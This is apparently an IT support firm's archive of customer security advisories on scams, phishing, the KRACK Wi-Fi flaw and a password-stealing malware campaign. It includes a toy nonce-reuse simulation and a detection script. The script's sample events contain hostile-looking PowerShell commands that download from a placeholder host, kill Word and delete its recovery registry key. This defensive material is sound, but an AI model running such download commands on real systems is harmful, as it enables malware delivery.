New Tech Support Scam Attacking Chrome Users
A new security breach scam has panicked many Google Chrome users. The scam freezes Chrome and convinces users that their network security has been compromised. The catch is that following the listed instructions leads to the actual security breach.
The scam starts by displaying an error message about a security breach that leaves the browser inaccessible and advises the end user to dial the listed phone number to fix the error. On the other end of that phone number is a scammer posing as an Apple or Microsoft technician, waiting to obtain your credit card and other personal information.
The fix, however, is quite easy. Windows users simply need to open Task Manager (press Ctrl + Shift + Esc), select the browser, and click End task. macOS users just need to wait until a system message prompts them to close the unresponsive Chrome tab.
If a problem surfaces, call our service team at 412-220-9330 x2 and we will help you through any security issues that lurk on the web.
Over the past few months, JENLOR has expanded our support team with new members. We would like to take this time to formally introduce you to our newest hires Douglas Foster and Chad Walker, who joined Chris Schoen’s Helpdesk team. Both of them add more depth and coverage to our customer base. We look forward to their contributions!
Douglas has been in the IT field for 4+ years with a passion around cyber security. He will be responsible for fielding inbound requests such as Helpdesk support, troubleshooting, and pre-staging customer equipment. Douglas relies on an easy-going, methodical approach to his work. Douglas is a very friendly and positive person when interacting with his coworkers and customers.
Chad has also been in the IT field for 4+ years, starting his career as an intern and eventually growing into a Senior Specialist before joining JENLOR. Chad has extensive experience in technical support, networking, and customer service. Chad will be counted upon for fast and reliable support to our customer base. Chad is a high-energy person with a strong technical mind who works quickly towards resolution and continues to absorb new information.
A security protocol at the heart of most modern Wi-Fi devices, including computers, phones, and routers, has been broken, putting almost every wireless-enabled device at risk of attack.
The bug, known as “KRACK” for Key Reinstallation Attack, exposes a fundamental flaw in WPA2, a common protocol used in securing most modern wireless networks. Mathy Vanhoef, a computer security academic, who found the flaw, said the weakness lies in the protocol’s four-way handshake, which securely allows new devices with a pre-shared password to join the network.
That weakness can, at its worst, allow an attacker to decrypt network traffic from a WPA2-enabled device, hijack connections, and inject content into the traffic stream.
802.11r is a standard for improving the roaming experience of wireless client devices as they physically move about a given network and, by virtue of distance and signal strength, automatically associate with and disassociate from various access points (APs). Associating with a new AP takes time because of the necessary authentication. 802.11r Fast BSS Transition (FT) speeds up the authentication and association process for roaming clients, helping to protect against packet loss and poor performance in applications like VoIP calls or streaming content.
Essentially, an attacker can expose sensitive information exchanged between a client device and a wireless access point by taking advantage of the fact that replayed frames aren’t accounted for when establishing a connection using FT. This allows an attacker to replay data sent to an AP, including sensitive encryption key data – enabling that attacker to decrypt/forge wireless frames. In all cases, an attacker needs to be in close proximity to the AP or client under attack.
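The following simplified model is an added example, not vendor or researcher code. It shows why an AP that re-processes a replayed FT reassociation request ends up reusing per-frame nonces, and how refusing to reinstall an already-installed key prevents it. The class, the key bytes and the SHA-256 keystream (a toy stand-in for the real cipher) are assumptions made for illustration.

```python
import hashlib

def keystream(key: bytes, pn: int, n: int) -> bytes:
    # Toy stand-in for the real per-frame keystream: depends only on (key, packet number).
    return hashlib.sha256(key + pn.to_bytes(6, "big")).digest()[:n]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

class AccessPoint:
    """Hypothetical AP model; tracks only the pairwise key and transmit packet number."""
    def __init__(self, hardened: bool):
        self.hardened = hardened
        self.ptk = None
        self.tx_pn = 0

    def on_ft_reassoc_request(self, ptk: bytes) -> bool:
        if self.hardened and ptk == self.ptk:
            return False              # same key already installed: keep the counter
        self.ptk, self.tx_pn = ptk, 0  # (re)install the key and reset the counter
        return True

    def send(self, plaintext: bytes):
        self.tx_pn += 1
        return self.tx_pn, xor(plaintext, keystream(self.ptk, self.tx_pn, len(plaintext)))

def simulate(hardened: bool):
    ap = AccessPoint(hardened)
    ptk = b"constructed-pairwise-key"          # constructed sample value
    ap.on_ft_reassoc_request(ptk)
    first = [ap.send(m) for m in (b"frame-one", b"frame-two")]
    ap.on_ft_reassoc_request(ptk)              # the same request arrives a second time
    later = [ap.send(m) for m in (b"frame-abc", b"frame-xyz")]
    pns = [pn for pn, _ in first + later]
    reused = sorted({pn for pn in pns if pns.count(pn) > 1})
    return reused, first, later

if __name__ == "__main__":
    for mode in (False, True):
        reused, first, later = simulate(mode)
        leak = xor(first[0][1], later[0][1]) == xor(b"frame-one", b"frame-abc")
        print(f"hardened={mode} reused_packet_numbers={reused} keystream_reused={leak}")
```

When a packet number repeats under the same key, the XOR of the two ciphertexts equals the XOR of the two plaintexts, which is why patched firmware must not reset the counter on a repeated request.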
Only unpatched wireless networks that have enabled 802.11r functionality are at risk. ALL JENLOR customers who are using Cisco Meraki are up to date and not at risk. We are working with other vendors for updates and patches. A full list of patches can be found here.
If you have any questions or concerns, please reach out to email@example.com or contact us directly at 412-220-9330.
The malware uses a Microsoft Intermediate Language (MSIL) payload that is compiled to steal passwords from the victim’s system, browser and FTP software, according to an Oct. 4 Zscaler blog post.
“The delivery method for this malware is the VBScript, which downloads the payload from the compromised website, and then downloads a decoy document to lead the victim to believe that the downloaded files are legitimate,” researchers said in the post.
The decoy appears to be a “public service” message from the Pennsylvania Department of Public Welfare that includes spam mitigation instructions.
The VBScript downloads the decoy, terminates the Microsoft Word process, downloads the payload via a PowerShell command, and removes the document recovery entries of Microsoft Word through registry entries.
Researchers said the malware performs various password stealing activities such as checking for antivirus and looking into the directories and files from which it will steal information once executed.
“The most interesting function of this malware is that it also behaves like a file stealer, as it checks for interesting strings in the system with enumeration of various files and folders and uploads to the malware’s C&C once it grabs the sensitive information,” the post said.
The malware seeks to steal passwords from Armory Wallet, Chrome, Firefox, CuteFTP, FileZilla, PuTTY, Electrum bitcoin wallet and WinSCP.
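The VBScript behaviour described above (terminating Word, downloading through PowerShell, clearing Word's recovery entries) can be hunted as a correlated sequence rather than as single events. The sketch below is an added example, not code from the Zscaler post: the event tuples are constructed, the field layout is hypothetical, and the `Word\Resiliency` registry path is an assumption, since the post as quoted here does not name the key.

```python
import re
from datetime import datetime, timedelta

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest", re.I)
# Assumption: Word keeps document-recovery entries under ...\Word\Resiliency.
RESILIENCY = re.compile(r"\\office\\[\d.]+\\word\\resiliency", re.I)
WINDOW = timedelta(minutes=2)

# Constructed telemetry: (time, host, parent image, event kind, detail).
EVENTS = [
    ("2017-10-04T09:00:01", "PC-01", "wscript.exe", "proc", "taskkill.exe /f /im winword.exe"),
    ("2017-10-04T09:00:03", "PC-01", "wscript.exe", "proc",
     r"powershell.exe (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','%TEMP%\a')"),
    ("2017-10-04T09:00:05", "PC-01", "wscript.exe", "reg_delete",
     r"HKCU\Software\Microsoft\Office\16.0\Word\Resiliency"),
    ("2017-10-04T09:05:00", "PC-02", "explorer.exe", "proc",
     "powershell.exe Invoke-WebRequest http://example.invalid/tool"),
    ("2017-10-04T09:06:00", "PC-03", "wscript.exe", "proc", "taskkill.exe /im winword.exe"),
    ("2017-10-04T09:00:00", "PC-04", "cscript.exe", "proc",
     "powershell.exe Invoke-WebRequest http://example.invalid/b"),
    ("2017-10-04T09:10:00", "PC-04", "cscript.exe", "reg_delete",
     r"HKCU\Software\Microsoft\Office\15.0\Word\Resiliency"),
]

def classify(parent, kind, detail):
    """Label one event with the behaviour it matches, or None."""
    if parent.lower() not in SCRIPT_HOSTS:
        return None                      # only script-host children are of interest
    d = detail.lower()
    if kind == "proc" and "powershell" in d and DOWNLOAD.search(d):
        return "ps_download"
    if kind == "proc" and "taskkill" in d and "winword" in d:
        return "kill_word"
    if kind == "reg_delete" and RESILIENCY.search(d):
        return "clear_recovery"
    return None

def detect(events, min_behaviours=2):
    """Return {host: behaviours} where enough distinct behaviours fall inside WINDOW."""
    hits = {}
    for ts, host, parent, kind, detail in events:
        label = classify(parent, kind, detail)
        if label:
            hits.setdefault(host, []).append((datetime.fromisoformat(ts), label))
    findings = {}
    for host, seen in hits.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):
            labels = {l for t, l in seen[i:] if t - start <= WINDOW}
            if len(labels) >= min_behaviours:
                findings[host] = sorted(labels)
                break
    return findings
```

Only PC-01 is reported: PC-02's download has no script-host parent, PC-03 shows a single behaviour, and PC-04's two behaviours are ten minutes apart.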
DON’T OPEN THAT GOOGLE DOC – Unless you’re positive it’s legit.
There’s a brand new phishing scam making its way around the internet. If you receive a Google Doc link in your inbox today, examine it carefully before you click to open, even if it looks like it came from someone you trust. You’ve heard it so many times, “think before you click,” but it really could save you a whole lot of hassle.
The importance of this phish is not how it spread, but rather how it didn’t use malware or fake websites tricking users to give up passwords. Phishers can use real Google accounts and develop third-party plugins that can interact with Google services, so they can lure victims in through perfect looking Google web pages.
Safety first: resisting the urge to click remains the best first line of defense out there. Be aware of inconsistencies or suspicious content in an email; listening to those instincts is important. Sometimes a second look is all it takes to realize that a coworker wouldn’t send a Google Doc to the entire company out of the blue.
If you feel you have been subject to this scam, please reach out to our service team for support.
As of the new year, there are some new phishing/spam campaigns that are on the horizon. This one is important to read and understand.
These campaigns are not targeted at the most sophisticated users; they go after the average user who may not think twice about entering credentials to unlock a PDF. That puts you at risk: when you enter your information and the document opens, anything you input is transmitted to the spammer, which allows them to steal your email credentials. Workstations that use the Adobe PDF reader are cautioned via a warning dialog; however, Windows 10 by default uses the Edge browser, and when Edge opens the PDF, unlike with Adobe, NO warning message is presented.
Be wary of emails from domains that don’t match the content, and look for other signs that give these away as scams. Be alert and keep your “human firewall” on its toes with security top of mind.
As always, if you think you have been subject to this type of scam, please call us for assistance.
Hello All –
We’ve recently seen an influx of SPAM – specifically related to Wire Transfers. These attempts are being made by Spammers and Spoofers.
If you receive anything regarding a request for any type of monetary transfer, even though this may be typical for your company, double-check the authenticity of the request, i.e. by phone or verbal communication.
As always, if you are suspicious of any email requests that are not typical for your organization, please forward the email to JENLOR’s service group at firstname.lastname@example.org. If you have immediate questions, please call service at 412-220-9330 x 2.
Please forward this communication to your end users – your best defense is education.
While this all sounds great, we do not recommend that you install this preview. As many of us have experienced, early versions of software updates tend to be unstable, and may cause instability with some of the current software you are running. If this Windows update is something you want to do, please call us; we can help you navigate the process more easily and work through any potential software conflicts you may have.
Hello All –
In an effort to continually keep our customers educated on new and emerging computer threats, we are sharing the latest information we’ve received about new malware that is targeting soon-to-be Windows 10 users.
Please be watchful for an email purporting to be from Microsoft with an attachment; the email verbiage claims to include an installer granting users “quick” access to the new Microsoft OS. The attached executable file is malware similar to the Cryptolocker virus – “ransomware” that encrypts your files, locking the owner out.
As always, if you are suspicious of an email attachment, please forward the email to JENLOR’s service group at email@example.com. If you have immediate questions, please call service at 412-220-9330 x 2.
Please forward this communication to your end users – your best defense is education.